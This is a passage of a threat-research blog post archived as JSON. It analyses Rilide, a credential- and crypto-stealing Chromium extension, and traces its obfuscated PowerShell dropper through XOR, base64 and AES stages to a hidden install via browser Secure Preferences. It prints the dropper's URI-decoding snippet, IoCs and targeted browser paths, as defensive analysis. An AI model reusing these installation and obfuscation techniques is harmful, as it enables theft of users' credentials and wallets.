{ "id": "ed99cc11-2975-40db-ac72-96948a3da874", "created_at": "2026-04-06T00:19:38.64608Z", "updated_at": "2026-04-10T13:12:22.536583Z", "deleted_at": null, "sha1_hash": "3e9238447cfc59691cf3c3c66304f3085ed342fb", "title": "Rilide: An Information Stealing Browser Extension", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4845219, "plain_text": "Rilide: An Information Stealing Browser Extension\r\nBy Pulsedive Threat Research\r\nPublished: 2025-03-21 · Archived: 2026-04-05 20:02:50 UTC\r\nRilide is an example of an information stealer masquerading as a browser extension. First reported in April 2023, the\r\nmalware targets Chromium-based browsers such as Google Chrome and Microsoft Edge. It is designed to take screenshots\r\nof information, log passwords, and collect credentials for cryptocurrency wallets. \r\nRilide is delivered via malicious advertisements or phishing pages. When users interact with these payloads, a loader installs\r\nthe Rilide extension. Security researchers have observed Rilide impersonating Google Drive and Palo Alto extensions.\r\nAssociated IoCs can be accessed using Pulsedive’s Explore feature.\r\nThis blog outlines:\r\nHow Rilide is delivered\r\nWalkthrough of an intrusion chain that dropped Rilide\r\nMitigation strategies\r\nHow Rilide is Delivered\r\nThreat researchers have identified multiple delivery mechanisms used to drop Rilide, with phishing websites being the most\r\ncommon. Versions from August 2023 were adapted to work with Chrome Extension Manifest V3. These changes include\r\nremoving the ability to execute external logic using executeScript() , eval() , and new Function() . Moreover,\r\nManifest V3 no longer allows developers to load and execute remotely hosted files; as such, all the logic must be part of the\r\nextension package itself.\r\nThe newer Rilide versions were delivered using three different mechanisms.\r\n1. The first campaign uses a PowerPoint lure with a phishing website to fetch the Rilide stealer.\r\n2. The second campaign leverages Twitter as the initial lure. When interacting with the Twitter lure, the user is\r\nredirected to a phishing website that downloads an executable file that sets up the malicious extension using an LNK\r\nfile.\r\n3. Researchers at Trustwave grouped two separate vectors into a third campaign. One intrusion chain is similar to the\r\nsecond campaign, with the only exception being the use of Google Ads instead of Twitter. The rest of the intrusion\r\nchain remains the same. The last intrusion chain uses a PowerShell loader to install Rilide. It is unclear how the user\r\nreceives the PowerShell Loader.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 1 of 31\n\nFigure 1: Campaigns leading to Rilide. This version of Rilide has been adapted to comply with the Chrome\r\nExtension Manifest V3 requirements. Source: Hacker News\r\nThe sample we analyzed for this blog belongs to campaign 3, which uses a PowerShell loader to install the malicious\r\nextension.\r\nAn Intrusion Dropping Rilide\r\nA PowerShell Dropper\r\nToward the end of November 2024, VMRay shared details about a PowerShell script used to drop a Rilide sample. As of\r\nMarch 15, 2025, VirusTotal indicates that only four vendors flag the script as malicious. The earliest sample in the intrusion\r\nchain starts with the PowerShell script identified by VMRay; however, the exact way the script was delivered to the user is\r\nunknown. Figure 2 shows the complete intrusion chain observed during analysis.\r\nFigure 2: Intrusion chain observed during analysis\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 2 of 31\n\nFigure 3: VirusTotal results for the PowerShell script as of March 15, 2025. Source: VirusTotal\r\nFile Details\r\nCharacteristic Value\r\nMD5 650052f23efde0ed4460b760134db8c6\r\nSHA-1 286574e458cddb32032ba4935d7f8e2716cfcf2c\r\nSHA-256 76afc4a7ef10d760c3fa42458e8f133f1ed4d76071ab6f4207037f64a4bffab7\r\nFile Size 2.15 KB\r\nFile Extension ps1\r\nBehavior\r\nFirst Stage\r\nWhen the PowerShell script is run, it launches another PowerShell instance that executes base64 encoded commands\r\nwithout displaying the PowerShell window to the user. \r\nFigure 4: Encoded PowerShell command captures within VMRay. Source: VMRay\r\nThe base64 encoded content can be decoded using CyberChef’s From Base64 recipe. The decoded content contains a base64\r\nencoded string, which is manipulated by replacing characters and XOR operations before being passed to the PowerShell\r\nfunction DownloadString as the URI. \r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 3 of 31\n\nFigure 5: Decoded PowerShell script contains base64 encoded values that go through a series of character\r\nmanipulations.\r\nThe URI can be decoded by running the code snippet within PowerShell before the script creates a new web client\r\nconnection. \r\n$lUhpJ = (\"kpC3/7WN/qCHo4b2sP@tgrfwv/+UrZ6oqfGIj4egrL7xlJeHt/GWt4OX+/s=\")\r\n$HgwsG = $lUhpJ.Replace(\"@\", \"a\")\r\n$TWJXW = [Convert]::FromBase64String($HgwsG) | ForEach-Object { $_ -bxor 198}\r\n$ZLb8q = [System.Text.Encoding]::ASCII.GetString($TWJXW).Replace(\"@\", \"a\")\r\n$RUveK = [Convert]::FromBase64String($ZLb8q)\r\n$QK9tt = [byte[]](37, 46, 201, 192, 220);\r\n$eyMTA = 0;\r\n$CJC2W = $RUveK | ForEach-Object {\r\n$_ -bxor $QK9tt[$eyMTA++];\r\nif ($eyMTA -ge $QK9tt.Length) {\r\n$eyMTA = 0\r\n}\r\n}\r\n$CJC2W\r\nCalling the parameter that holds the ASCII values for the URI returns the array string shown in Figure 6 below.\r\nFigure 6: ASCII values holding the second stage domain\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 4 of 31\n\nThe array of ASCII values can be decoded using the PowerShell command $mdKyK =\r\n[System.Text.Encoding]::ASCII.GetString($CJC2W); or using CyberChef’s From Decimal recipe.\r\nFigure 7: The ASCII values converted into text to reveal the second stage URI.\r\nWHOIS data for the decoded domain shows that it was registered with NameCheap. Moreover, the domain was registered\r\non October 5, 2024, approximately a month before the post from VMRay.  \r\nFigure 8: WHOIS data within the Pulsedive platform for tcl-black[.]com\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 5 of 31\n\nThe domain was unreachable as of March 15, 2025, but historical data was stored on URLscan.io. The webpage contained\r\nobfuscated code that the PowerShell script manipulates by replacing certain characters before converting it from base64.\r\nOnce the command is decoded, it is executed using PowerShell. \r\nFigure 9: A historical scan showing the content hosted on the decoded URL. Source: URLscan.io\r\nThe character conversations employed during this stage are:\r\nOriginal Value New Value\r\n! l\r\n* d\r\n`” T\r\n‘ H\r\n; F\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 6 of 31\n\nFigure 10: Decoded content from tcl-black[.]com reveals additional PowerShell Commands \r\nSecond Stage\r\nThe decoded script contains another blob of base64 that goes through a series of manipulations before being executed using\r\nthe iex command. The first manipulation is a series of character replacements that change certain symbols into characters\r\nwithin the base64 character set. The replacements are:\r\nOriginal Value New Value\r\n% d\r\n$ a\r\n! b\r\n@ B\r\nThis data is converted from base64 and XORed with a byte array. Following the XOR operation, the data is decrypted using\r\nAES256 in Cipher Block Chaining mode with a padding of PKCS7. The decryption key and initialization vector are stored\r\nas hardcoded variables that are base64 encoded.\r\nFigure 11: The decoded PowerShell script pulled from tcl-black[.]com\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 7 of 31\n\nThird Stage - Setting up Rilide\r\nThe decrypted data is additional PowerShell code that is executed. This code is used to install the Rilide extension. The\r\nPowerShell script's primary function is FCZoL, which first attempts to gather the current user's SID.\r\nFigure 12: Decrypted content from the second stage PowerShell Script that shows additional PowerShell\r\ncommands.\r\nFigure 13: The script uses PowerShell cmdlets to get the local user\r\nThe script then generates a random string that is 80 characters long and consists of alphanumeric characters. The following\r\nline of the script converts a string of bytes into a UTF-8 encoded string. This string contains a base64 blob containing JSON\r\ndata that appears to be related to the Rilide extension. \r\nFigure 14: Character set returned from a function within PowerShell.\r\nFigure 15: Base64 content reveals content that is later added to the Secure Preferences for managing settings\r\nfor a Chrome Profile. \r\nFigure 16: Extension details added to Secure Preferences.\r\nThe PowerShell script then creates strings that hold paths to web browsers. The browsers targeted, and the paths specified in\r\nthe malware are:\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 8 of 31\n\nFigure 17: PowerShell code used to create paths to web browser content on disk.\r\nWeb Browser Path\r\nChrome %localappdata%/Google/Chrome/User Data\r\nBrave %localappdata%/BraveSoftware/Brave-Browser/User Data\r\nEdge %localappdata%/Microsoft/Edge/User Data\r\nOpera %appdata%/Opera Software/Opera Stable\r\nThe PowerShell script contains all the content that makes up the Rilide files as hardcoded base64 strings. These strings are\r\nwithin the function aRUC2M . This function takes the previously created character set and the directory name where the\r\nextension will be stored. In this case, the directory name is $MxNC2$JJ0wH , as shown in the figure below.\r\nFigure 18: Path where the Rilide files are saved on disk.\r\nThe script attempts to create the path shown in Figure 18 and then tries to create files within that directory. \r\nFigure 19: Code used to create the $MxNC2$JJ0wH directory and drop the Rilide files.\r\nEach file that makes up the Rilide extension and its content is stored as base64-encoded pairs. The first variable is the file\r\nname, and the second is the actual content. The script writes the file for any file name containing the extension *.png . If\r\nthe file is contains the string manifest.json , a set of character replacements occurs before it is written to disk. For all other\r\nfiles, the script just writes the content to a file on disk.\r\nEncoded File Name Decoded File Name\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 9 of 31\n\nYXBwLmh0bWw= app.html\r\nY29uZmlnLmpz config.js\r\nZmlsZV9haGxkZmguanM= file_ahldfh.js\r\nZmlsZV9hdWtqemxsdGkuanM= file_aukjzllti.js\r\nZmlsZV9la3pwbHNqLmpz file_ekzplsj.js\r\nZmlsZV9namVpd3pzdC5qcw== file_gjeiwzst.js\r\nZmlsZV9wamJtY2dtLmpz file_pjbmcgm.js\r\naWNvLnBuZw== ico.png\r\nbWFuaWZlc3QuanNvbg== manifest.json\r\ncnVsZXMuanNvbg== rules.json\r\nZGlyX2pzcGN1eWZ1XGZpbGVfZGZlYWt5ZmlyLmpz dir_jspcuyfu\\file_dfeakyfir.js\r\nZGlyX2pzcGN1eWZ1XGZpbGVfa3ZueW5hLmpz dir_jspcuyfu\\file_kvnyna.js\r\nZGlyX2pzcGN1eWZ1XGZpbGVfdXFyZnRpanRnai5qcw== dir_jspcuyfu\\file_uqrftijtgj.js\r\nZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX215aHBuLmpz dir_jspcuyfu\\dir_kmidg\\file_myhpn.js\r\nZGlyX2pzcGN1eWZ1XGRpcl9rbWlkZ1xmaWxlX253ZXFnaGxudS5qcw== dir_jspcuyfu\\dir_kmidg\\file_nweqghln\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9mbXRxbi5qcw== dir_jspcuyfu\\dir_rodmrqczz\\file_fmtqn\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9qcmZ4ZS5qcw== dir_jspcuyfu\\dir_rodmrqczz\\file_jrfxe.\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uZ2dtZ2dpcXYuanM= dir_jspcuyfu\\dir_rodmrqczz\\file_nggm\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9uaXZ2aGRjLmpz dir_jspcuyfu\\dir_rodmrqczz\\file_nivvh\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 10 of 31\n\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9vbnRjYWNyb3MuanM= dir_jspcuyfu\\dir_rodmrqczz\\file_ontca\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb2RtcnFjenpcZmlsZV9yem56dnB3Lmpz dir_jspcuyfu\\dir_rodmrqczz\\file_rznzv\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYWFjY2hvYWZzdi5qcw== dir_jspcuyfu\\dir_rovhzbzexe\\file_aacc\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfYXZla2lmcnQuanM= dir_jspcuyfu\\dir_rovhzbzexe\\file_avek\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfZHdvcGJkeC5qcw== dir_jspcuyfu\\dir_rovhzbzexe\\file_dwo\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfc3Rla2xwZ3ouanM= dir_jspcuyfu\\dir_rovhzbzexe\\file_stekl\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeGlmanQuanM= dir_jspcuyfu\\dir_rovhzbzexe\\file_xifjt\r\nZGlyX2pzcGN1eWZ1XGRpcl9yb3ZoemJ6ZXhlXGZpbGVfeXdkZ3dkdW5kLmpz dir_jspcuyfu\\dir_rovhzbzexe\\file_ywd\r\nZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfYnBmZWxlLmpz dir_jspcuyfu\\dir_vhwpcwlaxi\\file_bpfe\r\nZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfb2RybHVzaC5qcw== dir_jspcuyfu\\dir_vhwpcwlaxi\\file_odrl\r\nZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfcmFwd2hjYXJhLmpz dir_jspcuyfu\\dir_vhwpcwlaxi\\file_rapw\r\nZGlyX2pzcGN1eWZ1XGRpcl92aHdwY3dsYXhpXGZpbGVfdnF5YmJyaGcuanM= dir_jspcuyfu\\dir_vhwpcwlaxi\\file_vqy\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfY3hoamNla3YuanM= dir_jspcuyfu\\dir_wzjggrl\\file_cxhjcekv\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfZGl6c3kuanM= dir_jspcuyfu\\dir_wzjggrl\\file_dizsy.js\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfaHJ0c2RyZy5qcw== dir_jspcuyfu\\dir_wzjggrl\\file_hrtsdrg.j\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfa253dnlqaGcuanM= dir_jspcuyfu\\dir_wzjggrl\\file_knwvyjh\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcHpib3ptby5qcw== dir_jspcuyfu\\dir_wzjggrl\\file_pzbozmo\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfcW5tb2lleC5qcw== dir_jspcuyfu\\dir_wzjggrl\\file_qnmoiex\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdHdrbWlicXkuanM= dir_jspcuyfu\\dir_wzjggrl\\file_twkmibq\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 11 of 31\n\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfdmlnbGJ0Y29zdC5qcw== dir_jspcuyfu\\dir_wzjggrl\\file_viglbtco\r\nZGlyX2pzcGN1eWZ1XGRpcl93empnZ3JsXGZpbGVfeHRhZXouanM= dir_jspcuyfu\\dir_wzjggrl\\file_xtaez.js\r\nZGlyX295cm5vcXFcZmlsZV9heGVscy5qcw== dir_oyrnoqq\\file_axels.js\r\nZGlyX295cm5vcXFcZmlsZV9iaHNoZXpoZW54Lmpz dir_oyrnoqq\\file_bhshezhenx.js\r\nZGlyX295cm5vcXFcZmlsZV9mcG1vbGJzLmpz dir_oyrnoqq\\file_fpmolbs.js\r\nZGlyX295cm5vcXFcZmlsZV9qZnJuZS5qcw== dir_oyrnoqq\\file_jfrne.js\r\nZGlyX295cm5vcXFcZmlsZV9ra3V5bXpxbmNzLmpz dir_oyrnoqq\\file_kkuymzqncs.js\r\nZGlyX295cm5vcXFcZmlsZV9rc2xreGN6Z3FzLmpz dir_oyrnoqq\\file_kslkxczgqs.js\r\nZGlyX295cm5vcXFcZmlsZV9wYWV3a3h5Lmpz dir_oyrnoqq\\file_paewkxy.js\r\nZGlyX295cm5vcXFcZmlsZV90cWR4bnltZi5qcw== dir_oyrnoqq\\file_tqdxnymf.js\r\nZGlyX295cm5vcXFcZmlsZV91c3poZ24uanM= dir_oyrnoqq\\file_uszhgn.js\r\nZGlyX295cm5vcXFcZmlsZV96YWJhcC5qcw== dir_oyrnoqq\\file_zabap.js\r\nZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2FicG5hb2guanM= dir_oyrnoqq\\dir_cqwucuiid\\file_abpna\r\nZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2VsbXpsb3VyeC5qcw== dir_oyrnoqq\\dir_cqwucuiid\\file_elmzl\r\nZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX2hmZXpkanBoei5qcw== dir_oyrnoqq\\dir_cqwucuiid\\file_hfezdj\r\nZGlyX295cm5vcXFcZGlyX2Nxd3VjdWlpZFxmaWxlX29xaHV2d3h0ei5qcw== dir_oyrnoqq\\dir_cqwucuiid\\file_oqhuv\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfYXJwaHB4bm5oLmpz dir_oyrnoqq\\dir_donxq\\file_arphpxnnh\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfY2R0dnlrb2ouanM= dir_oyrnoqq\\dir_donxq\\file_cdtvykoj.j\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfaGRodm92Lmpz dir_oyrnoqq\\dir_donxq\\file_hdhvov.js\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 12 of 31\n\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfanltanUuanM= dir_oyrnoqq\\dir_donxq\\file_jymju.js\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbGdsZHFwdWxxZy5qcw== dir_oyrnoqq\\dir_donxq\\file_lgldqpulq\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfbWNoY3RycWNuLmpz dir_oyrnoqq\\dir_donxq\\file_mchctrqcn\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfcnFxYXEuanM= dir_oyrnoqq\\dir_donxq\\file_rqqaq.js\r\nZGlyX295cm5vcXFcZGlyX2RvbnhxXGZpbGVfd3hudnB4Lmpz dir_oyrnoqq\\dir_donxq\\file_wxnvpx.js\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfY3l2aW9oaWpkai5qcw== dir_oyrnoqq\\dir_vzjkf\\file_cyviohijdj.j\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZGN5dGdiaS5qcw== dir_oyrnoqq\\dir_vzjkf\\file_dcytgbi.js\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZnhoemJjd3NxLmpz dir_oyrnoqq\\dir_vzjkf\\file_fxhzbcwsq\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfZ3F5bHZraGpzLmpz dir_oyrnoqq\\dir_vzjkf\\file_gqylvkhjs.j\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfaHJxeGIuanM dir_oyrnoqq\\dir_vzjkf\\file_hrqxb.js\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfbWdsZWxpdWd3Lmpz dir_oyrnoqq\\dir_vzjkf\\file_mgleliugw.\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfb3hmc2d3YnUuanM= dir_oyrnoqq\\dir_vzjkf\\file_oxfsgwbu.j\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfcXhjc2xyeC5qcw== dir_oyrnoqq\\dir_vzjkf\\file_qxcslrx.js\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc252dGEuanM= dir_oyrnoqq\\dir_vzjkf\\file_snvta.js\r\nZGlyX295cm5vcXFcZGlyX3Z6amtmXGZpbGVfc3NjcHJvdS5qcw== dir_oyrnoqq\\dir_vzjkf\\file_sscprou.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX2Fzb3RsZS5qcw== dir_pdhfxnpkx\\file_asotle.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX2ZyYmpiZ2Z4eC5qcw== dir_pdhfxnpkx\\file_frbjbgfxx.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX2hocHpxYnpzLmpz dir_pdhfxnpkx\\file_hhpzqbzs.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX2htZnpxaS5qcw== dir_pdhfxnpkx\\file_hmfzqi.js\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 13 of 31\n\nZGlyX3BkaGZ4bnBreFxmaWxlX2xlcHJjZ25qZC5qcw== dir_pdhfxnpkx\\file_leprcgnjd.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX25tZ3dwcnVlaHcuanM= dir_pdhfxnpkx\\file_nmgwpruehw.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX3lmYmxma3RjYS5qcw== dir_pdhfxnpkx\\file_yfblfktca.js\r\nZGlyX3BkaGZ4bnBreFxmaWxlX3lvc2dpZWFnbGcuanM= dir_pdhfxnpkx\\file_yosgieaglg.js\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbGx3dnRvaHYuanM= dir_pdhfxnpkx\\dir_gracvf\\file_llwvtoh\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfbHV2b2ouanM= dir_pdhfxnpkx\\dir_gracvf\\file_luvoj.js\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfb2ltbGpuYWdzbC5qcw== dir_pdhfxnpkx\\dir_gracvf\\file_oimljna\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfcHRwdm1zdm5xaC5qcw== dir_pdhfxnpkx\\dir_gracvf\\file_ptpvms\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRnZ3AuanM= dir_pdhfxnpkx\\dir_gracvf\\file_udggp.j\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdWRvbG9sLmpz dir_pdhfxnpkx\\dir_gracvf\\file_udolol.j\r\nZGlyX3BkaGZ4bnBreFxkaXJfZ3JhY3ZmXGZpbGVfdXhseHdrbWEuanM= dir_pdhfxnpkx\\dir_gracvf\\file_uxlxwk\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZHR1cmV2Z2ptay5qcw== dir_pdhfxnpkx\\dir_tojirz\\file_dturevgj\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZmNhZXRmdm9ubi5qcw== dir_pdhfxnpkx\\dir_tojirz\\file_fcaetfvo\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfZnJwZ3hmcGsuanM= dir_pdhfxnpkx\\dir_tojirz\\file_frpgxfpk\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfanpuYncuanM= dir_pdhfxnpkx\\dir_tojirz\\file_jznbw.js\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfbXFqZG9sd2wuanM= dir_pdhfxnpkx\\dir_tojirz\\file_mqjdolw\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdGVmeHlhby5qcw== dir_pdhfxnpkx\\dir_tojirz\\file_tefxyao.j\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfdm50aGhwZC5qcw== dir_pdhfxnpkx\\dir_tojirz\\file_vnthhpd\r\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeGl1Zm9odi5qcw== dir_pdhfxnpkx\\dir_tojirz\\file_xiufohv.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 14 of 31\n\nZGlyX3BkaGZ4bnBreFxkaXJfdG9qaXJ6XGZpbGVfeWVudHRreXFvLmpz dir_pdhfxnpkx\\dir_tojirz\\file_yenttkyq\r\nbW9kdWxlc1xjb250ZW50LXNjcmlwdHMtcmVnaXN0ZXItcG9seWZpbGwuNC4wLjAuanM= modules\\content-scripts-register-polyf\r\nc3JjXFRvZ2dsZVRlc3QuanM= src\\ToggleTest.js\r\nc3JjXGNvbnRlbnRcQWxlcnRSZWNlaXZlLmpz src\\content\\AlertReceive.js\r\nc3JjXGNvbnRlbnRcT3BlblJlbW92ZS5qcw== src\\content\\OpenRemove.js\r\nc3JjXGZpbmRlclxBbmFseXplUGFpbnQuanM= src\\finder\\AnalyzePaint.js\r\nc3JjXGZpbmRlclxBc3NpZ25UZXN0Lmpz src\\finder\\AssignTest.js\r\nc3JjXGZpbmRlclxDb3B5UmVkdWNlLmpz src\\finder\\CopyReduce.js\r\nc3JjXGZpbmRlclxEcmFnQ3JlYXRlLmpz src\\finder\\DragCreate.js\r\nc3JjXGZpbmRlclxEcmF3Lmpz src\\finder\\Draw.js\r\nc3JjXGZpbmRlclxFbmFibGVQZWVrLmpz src\\finder\\EnablePeek.js\r\nc3JjXGZpbmRlclxGb2N1cy5qcw== src\\finder\\Focus.js\r\nc3JjXGZpbmRlclxQcm9maWxlSW5zdGFsbENsb25lLmpz src\\finder\\ProfileInstallClone.js\r\nc3JjXGZpbmRlclxTaG93SGFuZGxlRHJhdy5qcw== src\\finder\\ShowHandleDraw.js\r\nc3JjXGZ1bmN0aW9uc1xDbG9zZVJlZHVjZS5qcw== src\\functions\\CloseReduce.js\r\nc3JjXGZ1bmN0aW9uc1xEZWxldGUuanM= src\\functions\\Delete.js\r\nc3JjXGZ1bmN0aW9uc1xEcmFnU3VtbWFyaXplLmpz src\\functions\\DragSummarize.js\r\nc3JjXGZ1bmN0aW9uc1xJbnZlcnQuanM= src\\functions\\Invert.js\r\nc3JjXGZ1bmN0aW9uc1xPcHRpbWl6ZUV2YWx1YXRlLmpz src\\functions\\OptimizeEvaluate.js\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 15 of 31\n\nc3JjXGZ1bmN0aW9uc1xQcmludC5qcw== src\\functions\\Print.js\r\nc3JjXGZ1bmN0aW9uc1xSZWNlaXZlLmpz src\\functions\\Receive.js\r\nc3JjXGZ1bmN0aW9uc1xSZW1vdmUuanM= src\\functions\\Remove.js\r\nc3JjXGZ1bmN0aW9uc1xSZXN1bWVSZXN1bWVNaXJyb3IuanM= src\\functions\\ResumeResumeMirror.js\r\nc3JjXGZ1bmN0aW9uc1xSZXRyaWV2ZVVwZGF0ZVN1Ym1pdC5qcw== src\\functions\\RetrieveUpdateSubmit.js\r\nc3JjXGZ1bmN0aW9uc1xSdW5EZXBsb3lGb2N1cy5qcw== src\\functions\\RunDeployFocus.js\r\nc3JjXGZ1bmN0aW9uc1xTYXZlLmpz src\\functions\\Save.js\r\nc3JjXGZ1bmN0aW9uc1xTZWxlY3REcmF3Lmpz src\\functions\\SelectDraw.js\r\nc3JjXGZ1bmN0aW9uc1xXYWl0Lmpz src\\functions\\Wait.js\r\nc3JjXG1haWxzXFJlbGVhc2UuanM= src\\mails\\Release.js\r\nThe last step in the PowerShell script is to add the extension to the different web browsers specified within the script itself.\r\nFigure 20: Function calls to add the Rilide extension to the targeted web browsers.\r\nBefore installing the malicious extension, the PowerShell script terminates any running instances of the web browsers\r\ntargeted before the extension is enabled. The extension is installed only for the user who is logged in when the script is\r\nrunning. It then attempts to modify the Secure Preferences or the Preferences file (for MSedge) within the Default or\r\nProfile subdirectories. The content shown in Figure 16 is updated to reflect the path shown in Figure 18. Once this\r\nmodification occurs, it is added to the Secure Preferences JSON file. The script also checks if the extension is installed; if it\r\nis, the content is updated to API content extracted by the script. Otherwise, it adds the content to the file.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 16 of 31\n\nFigure 21: Code used to add the content shown in Figure 16 to files used by the web browsers. This is used to\r\nadd the extension to the web browser.\r\nOnce the extension path is added to the preferences file, the PowerShell script waits 4 seconds before launching the web\r\nbrowser. \r\nFigure 22: The content from Figure 16 is updated to reflect the path to Rilide. The path was previously shown\r\nin Figure 18. \r\nRilide Browser Extension\r\nLike TrustWave's reporting, the malware masquerades as a Google Drive utility that claims to save content to Google Drive.\r\nThe extension's permissions indicate that it can interact with cookies, clipboard data, and system information. Rilide uses\r\ninjected scripts to steal credentials and cryptocurrency and take screenshots. \r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 17 of 31\n\nFigure 23: Functionality present within Rilide. Source: Hacker News\r\nThe extension masquerades as a Google Drive utility that aims to help users save content to Drive. This is indicated by the\r\nname and description specified in the manifest.json file and the extension’s icon.\r\nFigure 24: A screenshot showing Rilide installed in Google Chrome.\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 18 of 31\n\nFigure 25: Details about the Rilide extension within Google Chrome.\r\nFigure 26: The malware uses the Google Drive icon as its icon.\r\nThe main files in the extension are:\r\nconfig.js\r\nmanifest.json\r\nrules.json\r\nico.png\r\nsrc/ToggleTest.js\r\nsrc/content/OpenRemove.js\r\nsrc/content/AlertReceive.js\r\nsrc/content/Release.js\r\nThe extension’s directory contains other JavaScript files with helper functions that expand its functionality. These files are\r\nessential to the three scripts injected into each webpage. \r\nFigure 27: Files within the Rilide directory.\r\nmanifest.json\r\nhttps://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/\r\nPage 19 of 31\n\nThe extension’s manifest.json shows that the extension can query system information such as CPU and storage information.\r\nIt can also access the browser’s local storage. Moreover, the extension allows access to the clipboard for reading and 